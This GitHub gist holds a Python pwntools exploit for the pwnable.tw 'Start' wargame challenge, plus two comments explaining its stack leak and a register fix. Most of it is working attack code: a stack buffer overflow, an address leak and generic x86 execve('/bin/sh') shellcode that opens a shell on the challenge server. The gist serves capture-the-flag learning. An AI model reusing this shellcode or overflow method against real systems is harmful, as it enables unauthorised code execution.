Created
February 25, 2017 15:40
-
-
Save 0xPwny/188473545346a198ae0bb3f3e7ec30f1 to your computer and use it in GitHub Desktop.
Pwnable.tw - Start
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #ABDELJALIL NOUIRI | |
| #author : [email protected] | |
| from pwn import * | |
| HOST = 'chall.pwnable.tw' | |
| PORT = 10000 | |
| shellcode = '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' | |
| gad = 0x8048087 #mov %esp,%ecx | |
| def Expl0i7i7(ip,port): | |
| con = remote(ip,port) | |
| con.recv() | |
| payload= "A"*20+p32(gad) | |
| con.send(payload) | |
| leak = u32(con.recv(4)) | |
| print hex(leak) | |
| con.recv() | |
| payload = 'A'*20+p32(leak+0x18)+"DEAD"+'\x31\xd2'+shellcode | |
| con.send(payload) | |
| con.interactive("\nshell# ") | |
| Expl0i7i7(HOST,PORT) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
@yywing:
payload= "A"*20+p32(gad)will overwrite return address. Afterretninstruction executes,eipis equal to0x8048087. Now,esppoints to a variable that contains an address in stack. This value can be read.@hksuki:
you should read execve manual page carefully. The third argument of
execvepoints to environment block and it should beNULL. The third argument is pointed to byedx.'\x31\xd2'=xor edx, edx